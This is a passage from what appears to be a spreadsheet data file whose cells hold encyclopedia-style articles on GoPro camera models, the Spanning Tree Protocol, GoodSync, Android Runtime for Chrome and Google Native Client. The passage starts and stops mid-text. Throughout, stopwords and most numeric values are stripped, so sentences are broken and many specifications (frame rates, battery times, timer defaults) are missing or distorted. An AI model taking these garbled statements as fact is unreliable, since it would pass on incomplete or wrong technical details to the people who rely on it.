compatible gopro mounts. first listed august 2010. hero2 hero2 launched october 2011. 1/2.3" image sensor, improved low-light capability records fps. sold three different accessory packages outdoor, motorsports, surf editions. hero3 (white/silver/black) late 2012, gopro announced hero3 line cameras. these cameras came three editions: black, silver white, denoting relative capabilities camera, descending order. externally, model distinguished used print number front camera. three versions hero3 come smaller lighter package, wifi built change physical dimensions cameras compared previous generations hero hero2 physically identical) means accessories hero original hero2 compatible hero3, gopro made versions accessories specifically hero3, mostly also compatible hero3+, below. those versions accessories usually compatible older hero camera generations. however, accessories compatible hero camera generations. hero3 silver black cameras significantly less battery endurance hero original hero2. example, 720p resolution 25/30 fps, hero original hero2 stated battery runtime hours, hero3 silver edition stated battery runtime hours, hero3 black edition stated battery runtime hours (the black edition's "most economical" setting 1080p/30 fps, also partially contributes poor battery runtime). black edition sensor capture digital video fps, 2.7k video fps, 1440p fps, 1080p fps, 960p fps, 720p wvga fps. black edition also includes wifi remote. black edition cannot record 25/30 720p wvga resolutions; record fast frame rates resolutions. this deliberate firmware limitation, manufacturer expect high-end camera model used lower resolutions frame rates. silver edition uses sensor hero2, white edition uses sensor hero original. hero3+ (silver/black) october 2013, gopro released hero3+, available black silver editions, replacing hero3 generation. hero3+ camera models claim dramatically improved light performance waterproof enclosure lighter smaller hero3's, according gopro website. hero3+ camera housing smaller hero3. cameras claimed improved image sharpness (close focus hero3, expense distant focus slightly less sharp hero3+), better audio functionality wind noise reduction. battery life claimed longer hero3 model (both better efficiency higher-capacity battery dimensions).the black edition video modes 1440p48, 1080p60, 960p100 720p120 well 4k15 2.7k30 shoot stills fps. hero3+ black edition also offers optional function firmware (called "superview") increases field view. additional functions, including dynamic light situation adjustment, higher-quality recording modes (higher bitrates, white balance applied, etc.) etc. black edition continues include wifi remote. ability record 25/30 720p wvga modes record fast frame rates lower resolutions). this intentional firmware limitation. battery runtime hero3+ black edition significantly longer hero3 black edition 30–50% lower battery runtime older hero2 hero1. silver edition video modes 1080p60 720p120 shoot stills fps. contrast black edition, silver edition record 25/30 higher) supported resolutions. hero3+ silver edition also 25%–50% longer battery runtime recording hero3+ black edition (they batteries). difference runtime depends resolution/fps combination, whether wifi gopro mobile application used recording. difference runtime increases lowered additional functions deactivated cameras. battery runtime hero3+ silver edition similar battery runtime hero2 hero1. hero3 camera awarded 2013 technology engineering emmy award contribution television. hero4 (silver/black) september 2014, gopro announced hero4, available black edition silver edition, replace respective hero3+ generation predecessors. hero session, budget camera, also announced. hero4 black edition still megapixel (mp) cmos f/2.8 fixed maximum aperture focus free. adds bluetooth connectivity, highlight tag, protune available photo processor claimed gopro twice fast hero3+ black edition, doubling frame rates resolutions. hero4 black edition record video (3840×2160) frame rate fps. superview mode, possible fps. many rates resolutions available. hero4 black edition still shoots stills maximum maximum burst rate fps. with wi-fi disabled 4k/30, gopro claims hero4 black edition battery life minutes, increasing maximum 720p/240. hero4 black battery different form factor predecessors. initial side-by-side comparisons hero3+ hero4 black edition video results suggest newer model detail long range similar performance close range. hero4 silver edition basically hero3 black edition addition micro speaker, built-in touchscreen display, protune photo highlight (the first gopro this), lower clocked cortex-a9 missing black edition's integrated analog-to-digital converter supports wider variety professional low-sensitivity external microphones. video modes supported hero4 silver edition similar hero3+ black, higher processing speed thermal requirements encoding video (3840×2160), supports wi-fi, bluetooth contains ambarella inc. system chip (soc) hero4 black. hero4 models maintain h.264 video codec previous versions file formats. gopro claims mono microphone black silver editions twice dynamic range hero3+, hero4 black silver editions improved low-light performance. hero (2014) september 2014, gopro released entry level camera named simply "hero", priced $130, alongside hero4 black hero4 silver. built waterproof housing, unlike hero4 line.the gopro hero (2014) capture still images 5fps burst option. able record 1080p 25fps 720p 50fps microsd card 32gb. touch display front waterproof 40m. hero+lcd june 2015, company started sell gopro hero+lcd, provides video recording 1080p megapixel photos. hero+lcd also built waterproof housing.gopro hero+lcd touchscreen preview shot frame scene letting user navigate menu. feature camera instant camera editing. gopro hero+lcd waterproof, built directly waterproof case (waterproof feet m)). device also includes feature hilight tagging built-in video editing function, allows user label main points shooting video process view, makes possible quickly find desired footage later. also built-in wi-fi bluetooth, user-friendly modes like quikcapture, superview auto light. hero session hero session, released july 2015, smaller lighter compared versions gopro hero4 camera. hero+ october 2015, gopro released third entry level camera: gopro hero+. this camera previous hero+lcd 1080p 720p video resolution, burst photo resolution, built-in wi-fi bluetooth, waterproof modes like superview, auto light, quikcapture timelapse mode automatically captures photos time intervals seconds. however, built-in touchscreen display slightly lighter hero+lcd. hero+ weighs whereas hero+lcd weighs housing also remained same. hero5 hero5 black hero5 session introduced september 2016. they waterproof support video recording 1080p fps, automatic upload footage cloud voice controls. hero6 hero6 black introduced september 2017. camera waterproof supports hevc video recording 1080p fps, automatic upload footage cloud, voice controls wi-fi. first gopro sporting gopro's custom system chip (soc) gp1. hero (2018) hero (2018 edition) announced march 2018 intended entry-level camera alongside hero6 black. model offers similar features functionality hero5 black hero6 black, including touchscreen built-in time-lapse video mode, slightly lower resolution frame-rate, lacking functionality exposure control; hardware identical hero5, firmware modified include gopro hero5 black's capabilities. hero7 hero7 white, hero7 silver hero7 black announced released september 2018, seventh-generation action camera series gopro.the hero7 white intended entry-level camera, featuring 1440p resolutions video time-lapse video functions lack photos. hero7 silver intended mid-range camera, featuring resolutions video time-lapse video resolutions photo mode. initially, hero7 white silver defaulted video resolution 1440p 1080p available cropping. this considerable criticism, gopro responded releasing software updates cameras allow change default resolution 1080p. hero7 white silver qualcomm snapdragon image processor firmware based android. contrast hero7 black, cameras lacked time-lapse photo modes, protune, wake-on-voice capabilities, h.265 formats live-streaming. contrast, hero7 black introduced high-end level primarily encompasses features hero6 black major improvements. hero7 black introduced heavily improved electronic image stabilisation known "hypersmooth" video stabilization, gopro advertised heavily "gimbal-like", primary improvement. this feature resulted time-lapse video feature known "timewarp", essentially hyperlapse mode, although original time-lapse video mode continues remain. hero7 black also introduced live-streaming feature would live-stream content, 720p, directly hero7 black user's social media account, provided user keeps nearby internet-connected device. during release, hero7 black largely competed rival camera camera accessory manufacturer released osmo action, also introduced similar enhanced stabilization feature. february 2019, gopro released hero7 black "dusk white" color. this limited edition specs regular version differs color. hero8 hero8 black announced successor hero7 black october 2019, alongside gopro offered degree capture. hero8 black essentially contained former features hero7 black, however improved certain functions. most notably, "hypersmooth" feature introduced hero7 black improved named "hypersmooth 2.0", also resulting improvement timewarp feature introduced hero7 black. hero8 black also improved image quality, improving functions camera allow assist superphoto function camera automatically chooses image processing high dynamic range (hdr). gopro also reintroduced field-of-view (fov) functionality "digital lenses" retains original superview, wide, narrow, linear settings. moreover, live-streaming streams 1080p instead hero7 black's 720p imaging functionality expanded photo modes. hero8 black largely introduced several functions camera. physically, hero8 black incorporates connecting prongs used connect accessories, directly onto camera. originally, cameras would able access prongs cameras utilised either frames (for cameras hero5 hero7) protective cases hero4 before. moreover, gopro logo moved screen make extra microphones. more additions camera notably part software aspects camera. these included option switch various settings presets, including standard, activity, cinematic action shots adjusting on-screen shortcuts user interface. most notably part software, introduction night-lapse video, similar time-lapse video mode, automatically stitches frames captured camera intervals, however addition improved low-light performance. hero8 black also attempts address vloggers wish gopro manner. such, gopro also introduced external accessory known "media mod" includes type-c port supplying power external microphones accessories, micro-hdmi port 3.5mm microphone port. moreover, accessory includes mount connect either external microphones, leds screen. hero9 hero9 black announced successor hero8 black september 2020.the hero9 black essentially contained former features hero8 black, however, improved certain functions. most notably, "hypersmooth" feature introduced hero7 black refined hero8 black improved named "hypersmooth 3.0". also features resolution video photos adds front-facing 1.4-inch color "selfie" screen. hero9 slightly bigger models. hero10 hero10 black announced successor hero9 black september 2021.the hero10 black essentially contained former features hero9 black, however, improved certain functions. most notably, "hypersmooth" feature introduced hero7 black refined hero8 black improved named "hypersmooth 4.0". major changes processor, hero10 black shoots 5.3k video double frame rate, 23mp photos, enhanced low-light performance hypersmooth video stabilization modes. that, hero10 cloud connected—so moment charge footage automatically uploaded cloud. hero10 black size hero9 black. karma drone karma drone became available october 2016. drone compatible hero7 black, hero6 black, hero5 black hero4 black silver. drone minutes battery life. stabilizer taken attached karma grip. karma grip greater 1-hour battery life. november 2016, gopro announced recall karma drone following reports loss electrical power drone operation. february 2017, company announced karma drone return stores redesigned battery latch.on january 2018, gopro announced discontinuing karma drone exiting drone marketplace. multiple-lens synchronized cameras hero dual hero gopro released hero system april 2011, coupled hero cameras synchronization cable single housing form stereoscopic camera. cameras used upside-down mode. hero system also compatible hero2. synchronized videos processed using gopro cineform software exported anaglyph viewed wearing red-cyan glasses.in 2014, gopro released update dual hero system, provides similar functionality using hero3+ black edition cameras. updated dual hero bacpac sync/link cable asymmetric design: right primary camera (viewed lens facing away user) larger left (secondary) camera, left camera used upside-down mode. like preceding hero, dual hero uses cineform software process synchronized images videos export anaglyphs. odyssey odyssey 16-camera panoramic stereo designed produce content google jump virtual reality platform synchronizing cameras automatically stitching footage together. odyssey originally announced google 2015 gopro began taking applications "professional content creators" september us$15,000 rig, included gopro hero4 black cameras; limited shipments began 2016. omni omni also announced 2015, leveraging recent acquisition kolor, developed software stitch video footage together; omni camera synchronizes gopro hero4 black cameras, allowing users stitch make virtual reality 360° videos. omni began shipping august 2016. fusion fusion announced alongside hero6 black released november 2017. cameras, recording separate microsd memory card; outputs stitched together using bundled fusion studio desktop software 360° panorama video. fusion studio export several formats, including h.264 (4k), cineform 422, apple prores 422. succeeded fusion began shipping october 2019, alongside hero8. compared fusion, records single memory card includes color touchscreen allows users preview video. chips starting hero6 gopro stopped using ambarella soc's started making own, starting gp1. gopro gopro system-on-chip main task image processing. replaces earlier used ambarella soc's launched gopro hero6. designed collaboration socionext. encodes video h.265 codec, also known hevc. available resolutions 4k60, 2.7k120 1080p240 unstabilized 4k30, 2.7k60 1080p120 digitally stabilized. gopro gopro second generation system-on-chip. replaces earlier used soc's launched gopro hero10.the encodes video h.265 codec, also known hevc. available resolutions video 5.3k60, 4k120 2.7k240 wide microphone support following cameras official external microphone support: hero10 black hero hero hero7 black hero6 black hero5 black hero5 session hero4 black hero3+ hero3the following cameras lack official support external microphone: hero (2018) hero (2014) hero+ hero+lcd hero4 sessioncameras including hero series simple 3.5mm mini-usb adapter connect external microphones audio sources. starting hero black, digital-to-analogue converter longer part camera itself, instead relies external usb-c audio adapter manufactured sold gopro. although simpler models exist, trigger required menu item camera enable external sources, hence provide audio signal. adapter provides option connect audio power simultaneously. while adapter still works hero cameras, battery door needs removed expose usb-c port. this lead power loss operation camera subjected minor vibrations. third party doors available expose port holding battery firmly place. gopro's media also provides access external audio source. also unmanned aerial vehicle (uav) egocentric vision action camera references external links official website business data gopro:</t>
  </si>
  <si>
    <t>Spanning Tree Protocol</t>
  </si>
  <si>
    <t>spanning tree protocol (stp) network protocol builds loop-free logical topology ethernet networks. basic function prevent bridge loops broadcast radiation results them. spanning tree also allows network design include backup links providing fault tolerance active link fails. name suggests, creates spanning tree characterizes relationship nodes within network connected layer-2 bridges, disables links part spanning tree, leaving single active path network nodes. based algorithm invented radia perlman working digital equipment corporation.in 2001, ieee introduced rapid spanning tree protocol (rstp) 802.1w. rstp provides significantly faster recovery response network changes failures, introducing convergence behaviors bridge port roles this. rstp designed backwards-compatible standard stp. originally standardized ieee 802.1d functionality spanning tree (802.1d), rapid spanning tree (802.1w), multiple spanning tree (802.1s) since incorporated ieee 802.1q-2014. protocol operation need spanning tree protocol (stp) arose switches local area networks (lans) often interconnected using redundant links improve resilience connection fail.: however, connection configuration creates switching loop resulting broadcast radiations table instability.: redundant links used connect switches, switching loops need avoided.: avoid problems associated redundant links switched lan, implemented switches monitor network topology. every link switches, particular redundant links, catalogued. spanning-tree algorithm blocks forwarding redundant links setting preferred link switches lan. this preferred link used ethernet frames unless fails, case non-preferred redundant link enabled. when implemented network, designates layer-2 switch root bridge. switches select best connection towards root bridge forwarding block redundant links. switches constantly communicate neighbors using bridge protocol data units (bpdus).: provided link switches, root bridge calculates cost path based bandwidth. select path lowest cost, highest bandwidth, preferred link. enable preferred link path used ethernet frames switches, disable possible links designating switch ports connect preferred path root port.: after enabled switches elected root bridge, non-root bridges assign ports root port. this either port connects switch root bridge, several paths, port preferred path calculated root bridge. because switches directly connected root bridge communicate amongst using bpdus. each switch adds cost path cost received neighboring switches determine total cost given path root bridge. once cost possible paths root bridge added switch assigns port root port connects path lowest cost, highest bandwidth, eventually lead root bridge.: path cost path cost default originally calculated formula gbit/s/bandwidth. when faster speeds became available, default values adjusted otherwise speeds gbit/s would indistinguishable stp. successor rstp uses similar formula larger numerator: tbit/s/bandwidth. these formulas lead sample values table.: port states switch ports enabled categorized.: blocking port would cause switching loop active. prevent looped paths, user data sent received blocking port. bpdu data still received blocking state. blocked port forwarding mode links fail spanning tree algorithm determines port transition forwarding state. listening switch processes bpdus awaits possible information would cause return blocking state. populate table forward frames. learning while port forward frames, learn source addresses frames received adds table. forwarding port normal operation receiving forwarding frames. port monitors incoming bpdus would indicate return blocking state prevent loop. disabled network administrator manually disabled switch port.when device first attached switch port, immediately start forward data. instead number states processes bpdus determines topology network. port attached host computer, printer server always goes forwarding state, albeit delay seconds goes listening learning states. time spent listening learning states determined value known forward delay (default seconds root bridge). another switch connected, port remain blocking mode determined would cause loop network. topology change notification (tcn) bpdus used inform switches port changes. tcns injected network non-root switch propagated root. upon receipt tcn, root switch topology change flag normal bpdus. this flag propagated switches instructs rapidly forwarding table entries. configuration before configuring stp, network topology carefully planned. basic configuration requires enabled switches version chosen each. administrator determine switch root bridge configure switches appropriately. root bridge goes down, protocol automatically assign root bridge based bridge switches bridge default root bridge goes down, situation arises protocol assign switch root bridge based switch addresses. once switches assigned bridge protocol chosen root bridge switch, best path root bridge calculated based port cost, path cost port priority. ultimately calculates path cost basis bandwidth link, however links switches bandwidth. administrators influence protocol's choice preferred path configuring port cost, lower port cost likely protocol choose connected link root port preferred path. selection switches topology choose root port, least cost path root bridge, influenced port priority. highest priority mean path ultimately less preferred. ports switch priority, port lowest number chosen forward frames. root bridge bridge root bridge spanning tree bridge smallest (lowest) bridge each bridge configurable priority number address; bridge concatenation bridge priority address. example, bridge priority 32768 0200.0000.1111 32768.0200.0000.1111. bridge priority default 32768 configured multiples 4096. when comparing bridge ids, priority portions compared first addresses compared priorities equal. switch lowest priority switches root; tie, switch lowest priority lowest address root. example, switches (mac 0200.0000.1111) (mac 0200.0000.2222) priority 32768 switch selected root bridge. network administrators would like switch become root bridge, must priority less 32768. path root bridge sequence events determine best received bpdu (which best path root) lowest root bridge (bid) determines root bridge. lowest cost root bridge favors upstream switch least cost root lowest sender bridge serves tiebreaker multiple upstream switches equal cost root lowest sender port serves tiebreaker switch multiple (non-etherchannel) links single upstream switch, where: bridge priority bits) locally assigned system extension bits) [mac address] bits); default bridge priority 32768, port priority bits) (interface number) bits); default port priority 128. tiebreakers root ports when multiple paths bridge least-cost paths, chosen path uses neighbor bridge lower bridge root port thus connecting bridge lowest bridge example, figures, switch connected network segment instead segment would paths length root, path going bridge bridge because least-cost paths, lower bridge (24) would used tiebreaker choosing path use.paths when bridge segment leads least-cost path root, bridge lower bridge used forward messages root. port attaching bridge network segment designated port segment. figures, least-cost paths network segment root, going bridge bridge lower bridge tiebreaker dictates designated port port network segment connected bridge bridge equal, bridge lowest address would designated port. either case, loser sets port blocked.designated ports when root bridge port single segment, bridge effectively tied, root path costs (all equal zero). port segment lowest port becomes designated port. forwarding mode ports root bridge segment become non-designated ports blocking mode. bridge manufacturers follow rule, instead making root bridge ports designated ports, putting forwarding mode.final tiebreaker cases, still tie, root bridge multiple active ports segment (see above) equally root path costs bridge ids, cases, multiple bridges connected multiple cables multiple ports. case, single bridge multiple candidates root port. cases, candidates root port already received bpdus offering equally-low (i.e. "best") root path costs equally-low (i.e. "best") bridge ids, final tiebreaker goes port received lowest (i.e. "best") port priority port bridge protocol data units rules describe determining spanning tree computed algorithm, rules written require knowledge entire network. bridges determine root bridge compute port roles (root, designated, blocked) information have. ensure bridge enough information, bridges special data frames called bridge protocol data units (bpdu) exchange information bridge root path costs. bridge sends bpdu frame using unique address port source address, destination address multicast address 01:80:c2:00:00:00. there types bpdus original specification: (the rapid spanning tree (rstp) extension uses specific rstp bpdu): configuration bpdu (cbpdu), used spanning tree computation topology change notification (tcn) bpdu, used announce changes network topologybpdus exchanged regularly (every seconds default) enable switches keep track network changes start stop forwarding ports required. prevent delay connecting hosts switch topology changes, rapid developed, allows switch port rapidly transition forwarding state situations. bridge protocol data unit fields ieee 802.1d ieee 802.1aq bpdus following format: protocol bytes (0x0000 ieee 802.1d) version byte (0x00 config 0x02 0x03 0x04 bpdu) bpdu type: byte (0x00 config bpdu, 0x80 bpdu, 0x02 rst/mst config bpdu) flags: byte bits usage topology change (unused) proposal rst/mst/spt bpdu (unused) port role alternate/backup rst/mst/spt bpdu port role root rst/mst/spt bpdu port role designated rst/mst/spt bpdu (unused) learning rst/mst/spt bpdu (unused) forwarding rst/mst/spt bpdu (unused) agreement rst/mst/spt bpdu topology change acknowledgement root bytes (cist root mst/spt bpdu) bits usage root bridge priority 5–16 root bridge system extension 17–64 root bridge address root path cost: bytes (cist external path cost mst/spt bpdu) bridge bytes (cist regional root mst/spt bpdu) bits usage bridge priority 5–16 bridge system extension 17–64 bridge address port bytes message age: bytes 1/256 secs age: bytes 1/256 secs hello time: bytes 1/256 secs forward delay: bytes 1/256 secs version length: byte (0x00 protocol info present. rst, mst, bpdu only) version length: bytes (mst, bpdu only) bpdu includes fields only. spanning tree protocol standards first spanning tree protocol invented 1985 digital equipment corporation radia perlman. 1990, ieee published first standard protocol 802.1d, based algorithm designed perlman. subsequent versions published 1998 2004, incorporating various extensions. original perlman-inspired spanning tree protocol, called stp, standard differs ieee version message format well timer settings. some bridges implement ieee versions spanning tree protocol, interworking create issues network administrator.different implementations standard guaranteed interoperate, example differences default timer settings. ieee encourages vendors provide protocol implementation conformance statement, declaring capabilities options implemented, help users determine whether different implementations interoperate correctly. rapid spanning tree protocol 2001, ieee introduced rapid spanning tree protocol (rstp) ieee 802.1w. rstp incorporated ieee 802.1d-2004 making original standard obsolete. rstp designed backward-compatible standard stp. rstp provides significantly faster spanning tree convergence topology change, introducing convergence behaviors bridge port roles accomplish this. while take seconds respond topology change, rstp typically able respond changes within hello times (default: seconds) within milliseconds physical link failure. hello time important configurable time interval used rstp several purposes; default value seconds. rapid spanning tree operation rstp adds bridge port roles order speed convergence following link failure: root forwarding port best port non-root bridge root bridge designated forwarding port every segment alternate alternate path root bridge. this path different using root port backup backup/redundant path segment another bridge port already connects disabled strictly part stp, network administrator manually disable portthe number switch port states port reduced three instead stp's original five: discarding user data sent port learning port forwarding frames yet, populating mac-address-table forwarding port fully operationalrstp operational details: detection root switch failure done hello times, seconds default hello times changed. ports configured edge ports attached bridges attached. these edge ports transition directly forwarding state. rstp still continues monitor port bpdus case bridge connected. rstp also configured automatically detect edge ports. soon bridge detects bpdu coming edge port, port becomes non-edge port. rstp calls connection switches "link-type" connection. port operates full-duplex mode assumed point-to-point link, whereas half-duplex port (through hub) considered shared port default. this automatic link type setting overridden explicit configuration. rstp improves convergence point-to-point links reducing max-age time times hello interval, removing listening state, exchanging handshake switches quickly transition port forwarding state. rstp anything differently shared links. unlike stp, rstp respond bpdus sent direction root bridge. rstp bridge propose spanning tree information designated ports. another rstp bridge receives information determines superior root information, sets ports discarding. bridge send agreement first bridge confirming superior spanning tree information. first bridge, upon receiving agreement, knows rapidly transition port forwarding state bypassing listening/learning state transition. this essentially creates cascading effect away root bridge designated bridge proposes neighbors determine make rapid transition. this major elements allows rstp achieve faster convergence times stp. discussed port role details above, rstp maintains backup details regarding discarding status ports. this avoids timeouts current forwarding ports fail bpdus received root port certain interval. rstp revert legacy interface legacy version bpdu detected port. standards vlans rstp segregate switch ports vlan. however, ethernet switched environments multiple vlans exist, often desirable create multiple spanning trees traffic different vlans uses different links. proprietary standards before ieee published spanning tree protocol standard vlans, number vendors sold vlan capable switches developed spanning tree protocol versions vlan capable. cisco developed, implemented published per-vlan spanning tree (pvst) proprietary protocol using proprietary inter-switch link (isl) vlan encapsulation, pvst+ uses 802.1q vlan encapsulation. both standards implement separate spanning tree every vlan. cisco switches commonly implement pvst+ implement spanning trees vlans switches implement vlan protocol. provides pvst pvst+ compatibility network switches. some devices force10 networks, alcatel-lucent, extreme networks, avaya, brocade communications systems blade network technologies support pvst+. extreme networks limitations: lack support ports vlan untagged/native, also vlan pvst+ tunnel across mstp region.the switch vendor juniper networks turn developed implemented vlan spanning tree protocol (vstp) provide compatibility cisco's pvst, switches vendors included lan. vstp protocol supported series juniper networks. there restrictions compatibility vstp: vstp supports different spanning-tree topologies. vlans, recommended configure rstp addition vstp, vlans beyond handled rstp. mvrp support vstp. protocol use, vlan membership trunk interfaces must statically configured.by default, vstp uses rstp protocol core spanning-tree protocol, usage forced network includes bridges. more information configuring vstp juniper networks switches published official documentation.cisco also published proprietary version rapid spanning tree protocol. creates spanning tree vlan, like pvst. cisco refers rapid per-vlan spanning tree (rpvst). multiple spanning tree protocol multiple spanning tree protocol (mstp), originally defined ieee 802.1s-2002 later merged ieee 802.1q-2005, defines extension rstp develop usefulness vlans. standard, spanning tree maps vlans called multiple spanning tree (mst). under mstp, spanning tree defined individual vlans groups vlans. furthermore, administrator define alternate paths within spanning tree. switches first assigned region, vlans mapped assigned mst. common spanning tree (cst) several vlans mapped, group vlans called instance (msti). csts backward compatible rstp standard. vlan assigned internal spanning tree (ist).unlike proprietary per-vlan spanning tree implementations, mstp includes spanning tree information single bpdu format. reduce number bpdus required communicate spanning tree information vlan, also ensures backward compatibility rstp and, effect, classic too. mstp encoding additional region information standard rstp bpdu well number msti messages (from instances, although practice many bridges support fewer). each msti configuration messages conveys spanning tree information instance. each instance assigned number configured vlans frames assigned vlans operate spanning tree instance whenever inside region. order avoid conveying entire vlan spanning tree mapping bpdu, bridges encode digest vlan instance table mstp bpdu. this digest used mstp bridges, along administratively configured values, determine neighboring bridge region itself. mstp fully compatible rstp bridges mstp bpdu interpreted rstp bridge rstp bpdu. this allows compatibility rstp bridges without configuration changes also causes rstp bridges outside mstp region region single rstp bridge regardless number mstp bridges inside region itself. order facilitate view mstp region single rstp bridge, mstp protocol uses variable known remaining hops time live counter instead message timer used rstp. message time incremented spanning-tree information enters region, therefore rstp bridges region spanning tree. ports edge mstp region connected either rstp bridge endpoint known boundary ports. rstp, ports configured edge ports facilitate rapid changes forwarding state connected endpoints. shortest path bridging ieee 802.1aq also known shortest path bridging (spb) allows redundant links switches active multiple equal cost paths, provides much larger layer-2 topologies, faster convergence, improves mesh topologies increased bandwidth devices allowing traffic load share across paths mesh network. consolidates multiple existing functionalities, including spanning tree protocol (stp), multiple spanning tree protocol (mstp), rapid spanning tree protocol (rstp), link aggregation, multiple registration protocol (mmrp) link state protocol. system extension bridge (bid) field inside bpdu packet. eight bytes length. first bytes bridge priority, unsigned integer 0–65,535. last bytes address supplied bridge. prior ieee 802.1d-2004, first bytes gave 16-bit bridge priority. since ieee 802.1d-2004, first four bits configurable priority, last twelve bits carry bridge system extension. case mst, bridge system extension carries mstp instance number. some vendors bridge system extension carry vlan allowing different spanning tree vlan, cisco's pvst. disadvantages current practice spanning tree older protocol longer convergence time. improper implementation contribute network disruptions. blocking links crude approach high availability preventing loops. modern networks make connected links protocols inhibit, control suppress natural behavior logical physical topology loops. newer, robust protocols include trill (transparent interconnection lots links) protocol, also created perlman, shortest path bridging ieee. configuring connections network equipment layer-3 links relying routing resiliency prevent loops popular alternative. switch virtualization techniques like cisco virtual switching system virtual portchannel intelligent resilient framework combine multiple switches single logical entity. such multi-chassis link aggregation group works like normal port trunk, distributed multiple switches. conversely, partitioning technologies compartmentalize single physical chassis multiple logical entities. edge network, loop-detection configured prevent accidental loops users. also distributed minimum spanning tree etherchannel ethernet automatic protection switching ethernet ring protection switching flex links flooding (computer networking) media redundancy protocol minimum spanning tree unidirectional link detection notes references external links cisco home page spanning-tree protocol family (discusses cst, mistp, pvst, pvst+, rstp, stp) article wireshark wiki includes sample pcap-file captured traffic. perlman, radia. "algorhyme". university california berkeley. archived original 2011-07-19. ieee standards ansi/ieee 802.1d-2004 standard, section discusses rstp (regular longer part standard. this pointed section ansi/ieee 802.1q-2005 standard, section discusses mstp rfcs 4363–2006, proposed standard, definitions managed objects bridges traffic classes, multicast filtering, virtual extensions 4188–2005, proposed standard, definitions managed objects bridges 2674–1999, proposed standard, definitions managed objects bridges traffic classes, multicast filtering virtual extensions 1525–1993, sbridgemib, proposed standard, definitions managed objects source routing bridges 1493–1993 bridgemib, draft standard, definitions managed objects bridges spanning tree direct indirect link failures ccie study spanning tree protocol overview</t>
  </si>
  <si>
    <t>GoodSync</t>
  </si>
  <si>
    <t>goodsync backup file synchronization program. used synchronizing files directories, either computer, computer another storage device (e.g. another computer, removable disc, flash drive smartphone) computer remote computer server. features goodsync allows version files maintained multiple computing devices. words, devices synchronized, user sure current version file available devices, regardless last modified. file masks filters allow user define exactly files folders include ignore. detects 'conflicts' file modified sources, displays user. tree view intended synchronization, many views files overwrite, files delete, files length, different time excluded files. like superflexible file synchronizer, allway sync unison, capability remember previous state directories database, thus also propagate deletions. automatically keep backups files deleted/overwritten goodsync detect time state file changed modify side, without copying entire file. goodsync update back-up files local network internet. this, supports ftp, sftp, webdav, amazon storage, amazon drive, onedrive/onedrive business, backblaze, google drive, windows azure, windows mobile/activesync, dropbox (via core api) gstp (goodsync connect proprietary protocol). synchronization android devices gstp, goodsync server device. note late 2017 protocols supported version (google drive, acd, backblaze, dropbox, box, onedrive, sharepoint office365) dubbed "out-of-beta", never stated beta before, removed goodsync version requiring paid upgrade version scheduler: synchronization jobs automatically according desired schedule. on-file-change: synchronization triggered changes left right folder. recognizes removable drive, even mounted different letter before. copy locked files. unique goodsync enterprise edition: mass deployment (installation, activation configuration) policies: customize user experience running scripts synchronization process force backup sync windows logon and/or logoff configure execute jobs command line command line version, including ability schedule command line integration active directory parameterized backup paths %yyyy%-%mm%-%dd% versions there several versions: goodsync (shareware version, 30-day fully functional, sync limitations, three jobs files unattended use) goodsync goodsync (for removable drives) goodsync enterprise (and enterprise server) goodsync goodsync linux (shareware, command line version goodserver) goodsync version beta (for windows, re-designed modern additional features) also file synchronization backup disk image list backup software list disk imaging software references external links official website "goodsync desktop review". expertreviews.co.uk. 2012-05-04. retrieved 2013-10-03. roseberry, catherine. "about.com review". about.com. retrieved 2009-08-11. truman, mark (2008-04-30). "geek.com review goodsync". geek.com. archived original 2009-09-17. retrieved 2009-08-11.</t>
  </si>
  <si>
    <t>Google App Runtime for Chrome</t>
  </si>
  <si>
    <t>android runtime chrome (arc) compatibility layer sandboxing technology running android applications desktop laptop computers isolated environment. allows applications safely browser, independent user operating system, near-native speeds. overview android runtime chrome partially open-sourced project development google. announced sundar pichai google 2014 developer conference. limited beta consumer release september 2014, duolingo, evernote, sight words, vine android applications made available chrome store installation chromebook devices running version higher.as january 2015, development google taking place behind closed doors individual repository commits, code reviews issue tracking kept internal company. open sourced parts licensed bsd-style license. development limited beta consumer release september 2014, duolingo, evernote, sight words, vine android applications made available chrome store installation chromebook devices running version higher.in october 2014, three apps added: cloudmagic, onefootball, podcast addict.in march 2015, anandtech reported media player added coming months.on april 2015, google released welder, chrome packaged providing runtime application packager. intended give android developers preview upcoming technology chance test android apps chrome platform. architecture builds upon google native client. native client platform extended posix-compatible layer nacl integrated runtime pepper apis emulate linux environment foundation android phone. this allows running almost unchanged dalvik sandboxed environment. uses chrome permission system, android one. security according security evaluation meng apps communicate installed chrome extensions files stored underlying operating system might open avenues various attacks. these threats mitigated heavily sandboxed environment arc. community efforts during second half 2014, developer tools documentation released google, several community efforts appeared. vlad filippov maintains archon, unofficial distribution runtime installed non-chromebook computers. developer also maintains javascript (nodejs) tool automate packaging android apps arc.other developers created user-friendly tools beyond chromeos-apk simplify packaging applications arcon runtime. first chrome packaged called twerk android application arcon packager used named chrome packager name changed google's request. software there active reddit community maintains list android apps work arcon runtime. vlad filippov published guide opera mini inside chromium browser. reception reception mostly positive. some developers expressed confusion wide scale competing development platforms google offers: apps, chrome packaged apps android apps delivered arc. google responded fully committed platforms encourage developers choose fits best. also google native client bluestacks android-x86 references external links runtime chrome (beta) extension google market welder developer tool google market archived 2020-01-10 wayback machine repository (arc source code repository)</t>
  </si>
  <si>
    <t>Google Native Client</t>
  </si>
  <si>
    <t>google native client (nacl) sandboxing technology running either subset intel x86, arm, mips native code, portable executable, sandbox. allows safely running native code browser, independent user operating system, allowing apps near-native speeds, aligns google's plans chrome also used securing browser plugins, parts applications full applications zerovm.to demonstrate readiness technology, december 2011, google announced availability several chrome-only versions games known rich processor-intensive graphics, including bastion longer supported chrome store). nacl runs hardware-accelerated graphics (via opengl 2.0), sandboxed local file storage, dynamic loading, full screen mode, mouse capture. there also plans make nacl available handheld devices.portable native client (pnacl) architecture-independent version. pnacl apps compiled ahead-of-time. pnacl recommended nacl cases. general concept nacl (running native code browser) implemented activex, which, still use, full access system (disk, memory, user-interface, registry, etc.). native client avoids issue using sandboxing. alternative sorts nacl asm.js, also allows applications written compiled browser half native speed), also supports ahead-of-time compilation, subset javascript hence backwards-compatible browsers support directly. another alternative (while initially powered pnacl) webassembly. october 2016, comment chromium issue tracker indicated google's pepper native client teams destaffed. 2017, google announced deprecation pnacl favor webassembly. although initially google planned remove pnacl first quarter 2018, later second quarter 2019, currently planned removal june 2022 (together chrome apps). overview native client open-source project developed google. date, quake, xaos, battle wesnoth, doom, lara croft guardian light, from dust, mame, well sound processing system csound, ported native client. native client available google chrome browser since version enabled default since version portable native client (pnacl, pronounced: pinnacle) released.an implementation released march 2010. x86-64, ia-32, mips also supported. application portably pnacl, must compiled architecture-agnostic stable subset llvm intermediate representation 